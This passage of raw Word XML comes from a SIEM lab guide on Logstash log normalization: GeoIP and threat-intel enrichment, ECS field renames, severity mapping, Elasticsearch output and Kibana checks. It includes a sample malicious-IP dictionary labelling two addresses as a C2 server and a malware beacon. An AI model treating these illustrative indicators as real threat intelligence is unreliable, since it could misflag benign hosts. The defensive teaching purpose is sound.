      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [source][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E44295" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>geoip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB219A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      source =&gt; "[source][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4D1C1" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      target =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>geoip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660FDDE2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      database =&gt; "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/GeoLite2-City.mmdb"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C02236" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AED35CE" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6935DE8C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7A256" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Docs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId52" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/plugins-filters-geoip.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>Download GeoLite2 DB (free signup): https://dev.maxmind.com/geoip/geolite2-free-geolocation-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040B924A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="43ABC76E">
          <v:rect id="_x0000_i1089" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7DA94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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> b. Threat Intelligence (check IPs/domains)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2189345D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Enrich data with external threat feeds (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>AbuseIPDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> or AlienVault OTX).</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>Simplest: local CSV of known bad IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA8A09" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E423A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [destination][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF8570" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    translate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706ECF69" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      field =&gt; "[destination][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617D20C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      destination =&gt; "[threat][indicator][description]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE20D92" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>dictionary_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/config/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>malicious_ips.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2F7382" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706EF10E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B229414" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2897B5FC" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>malicious_ips.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D3B9E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>"45.67.23.12": "Known C2 Server"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655509A4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>"104.21.56.22": "Malware beacon"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FD257" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="300E9856">
          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19150D74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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> c. User &amp; Process normalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B1D74F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>mutate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9DC611" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  rename =&gt; { "user" =&gt; "[user][name]" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC4683F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  rename =&gt; { "process" =&gt; "[process][name]" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E00C35" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  rename =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "[process][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>]" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3641267F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E966C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Aligns to Elastic Common Schema → easier filtering in Kibana.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398DA798" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="3AF6D8C2">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A633D86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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> d. Add severity mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3C0636" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>mutate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C718DD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.severity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "medium" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211A88F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C3A5B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>if [event][module] == "auth" and "failed password" in [message] {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7AF0C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  mutate { replace =&gt; { "[event][severity]" =&gt; "high" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F631ED4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A258B8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="2AE66930">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37328367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🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.5 Output Section (write to Elasticsearch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E7EA39" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>output {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07116474" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41475E27" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    hosts =&gt; ["elasticsearch:9200"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F3D7DB" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    index =&gt; "normalized-logs-%{+YYYY.MM.dd}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AACD6A8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    user =&gt; "elastic"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B3CCA9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    password =&gt; "${ELASTIC_PASSWORD}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF633D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604EC797" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> { codec =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>rubydebug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> }  # Debug output to console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494BE10B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F054021" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="645E20B1">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A29BA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🧮</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.6 Validate the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F823C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Restart Logstash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26542472" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">docker compose restart </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0506EB94" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># or if native:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75884F26" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> restart </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09516277" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Check logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123B13E0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">docker compose logs -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F762507" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>If successful → you’ll see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727787A2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Pipeline started successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B490F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="0A19005E">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EC45A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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.7 Verify in Kibana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF8CEF" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stack Management → Index Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>You’ll see a new index:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>normalized-logs-2025.10.08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E774F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Create a new </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> for it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A13B3F1" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Discover</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> tab → filter for</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">: auth or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>: windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EAFEC4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">You’ll now see </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clean structured fields</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t>, not messy text!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C735B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="7C2FD65C">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34222ED8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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.8 Troubleshooting parsing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5890"/>
      </w:tblGrid>
      <w:tr w:rsidR="00645538" w:rsidRPr="00645538" w14:paraId="3FB236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BE492" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00645538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2C2C6F2F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00645538">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00645538" w:rsidRPr="00645538" w14:paraId="0F0D9E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2E0C9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
            <w:r w:rsidRPr="00645538">
